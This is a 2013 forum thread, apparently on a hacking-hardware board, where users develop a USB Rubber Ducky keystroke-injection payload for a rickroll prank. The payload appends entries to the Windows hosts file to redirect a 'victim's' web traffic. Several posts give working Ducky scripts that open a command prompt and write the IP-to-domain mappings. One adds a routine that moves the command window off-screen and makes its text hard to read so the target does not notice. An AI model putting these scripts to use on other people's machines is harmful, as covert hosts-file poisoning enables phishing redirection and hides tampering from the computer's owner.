zac115 Posted January 7, 2013 Posted January 7, 2013 (edited) so dose any one here think that it is possible to bring the rick role from the pineapple and the fast typing of the duck and put them together so when a person trys to surf they will always see rick astley and hear his song Edited January 8, 2013 by zac115 Quote
Scout32 Posted January 8, 2013 Posted January 8, 2013 You can do this with just the Pineapple using dnsspoof. Or are you talking about using just the ducky? Quote
no42 Posted January 8, 2013 Posted January 8, 2013 your probably looking at editing the c:\windows\system32\drivers\etc\hosts file, and mapping hostnames www.(google/facebook/hotmail/twitter).com to an ip, that has a rickroll as an index page. You'll need admin user privs to pull it off. Quote
zac115 Posted January 8, 2013 Author Posted January 8, 2013 your probably looking at editing the c:\windows\system32\drivers\etc\hosts file, and mapping hostnames www.(google/facebook/hotmail/twitter).com to an ip, that has a rickroll as an index page.You'll need admin user privs to pull it off. You can do this with just the Pineapple using dnsspoof. Or are you talking about using just the ducky? well i dont have a pinapple pineapple but i do have a rubber ducky so can you guys give me a example of a ducky script for it Quote
overwraith Posted January 8, 2013 Posted January 8, 2013 (edited) Local DNS Poisioning/Spoofing IP_ADDRESS is the IP address of the website you want the victim to be directed to. DOMAIN_NAME is the domain name (Web page) you want the victim to type in. REM Typing in the command prompt. Appending to the end of the hosts file. STRING echo "IP_ADDRESS TAB STRING DOMAIN_NAME">> C:\Windows\System32\drivers\etc\hosts ENTER Should look more or less like this typed into cmd prompt: echo "IP_ADDRESS DOMAIN_NAME" >> C:\Windows\System32\drivers\etc\hosts I haven't tested this script yet, should be a good enough proof of concept though. Edited January 8, 2013 by overwraith Quote
overwraith Posted January 8, 2013 Posted January 8, 2013 Ignore Last, no good way to insert tabs into the command line the way we would need to. Quote
zac115 Posted January 9, 2013 Author Posted January 9, 2013 Ignore Last, no good way to insert tabs into the command line the way we would need to. it is a cool idea tho is it not i mean put that with konboot and sit and you got your self one hell of a hack Quote
ashbreeze96 Posted January 9, 2013 Posted January 9, 2013 The hosts file only requires a space, not a tab. I have not tried on the ducky yet, but from cmd, echo. >> c:\windows\system32\drivers\etc\hosts will append a carriage return to ensure you are on a new line and echo IP DOMAIN >> c:\windows\system32\drivers\etc\hosts will append your desired entry Quote
Solution overwraith Posted January 9, 2013 Solution Posted January 9, 2013 (edited) Cool, I've just been introduced to the hosts file, and had no idea that a space would work also. So a working version of what I posted above would look like: REM Typing in the command prompt. Appending to the end of the hosts file. REM Enter a newline before we enter our false IP address/Domain Name STRING echo. >> c:\windows\system32\drivers\etc\hosts ENTER REM With a space between IP_ADDRESS and DOMAIN_NAME STRING echo IP_ADDRESS DOMAIN_NAME >> C:\Windows\System32\drivers\etc\hosts ENTER And for anyone who wants to know a websites IP address, just type ping www.website.com into the command prompt to determine the websites IP address. Edited January 9, 2013 by overwraith Quote
ashbreeze96 Posted January 9, 2013 Posted January 9, 2013 (edited) here is a payload i tested on my personal computer on lunch (i live close enough to work to go home and eat) DELAY 3000 GUI d DELAY 50 GUI r DELAY 50 STRING cmd DELAY 50 ENTER DELAY 50 STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS DELAY 50 ENTER DELAY 50 STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS DELAY 50 ENTER it mapped admin.com to my home router. it probably doesn't require all the delays, but they dont hurt anything and i was writing on my work computer so i didnt have a way to test timing of commands Edited February 6, 2013 by midnitesnake Corrected Formatting Quote
overwraith Posted January 9, 2013 Posted January 9, 2013 (edited) Here is a duck script that I usually paste at the beginning of my duck scripts. I modified it based on what somebody else suggested in the Duck community for hiding the command prompt, and making the text so it is hard to read even if they do see the command prompt. When you run it the ducky quickly hides the command window below the bottom of your screen. Should work for Windows 7 and Vista. CONTROL ESCAPE STRING cmd /Q /D /T:7F /F:OFF /V:ON /K DELAY 500 ENTER DELAY 750 ALT SPACE STRING M DOWNARROW REPEAT 100 ENTER Edited January 9, 2013 by overwraith Quote
ashbreeze96 Posted January 9, 2013 Posted January 9, 2013 Thanks, that is a good tip. I'm not sure i would use the control escape though, it limits your script to win 7 machines since xp doesn't have the run field in the start menu. I will check it out, there shouldn't be any issue using GUI r instead Quote
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.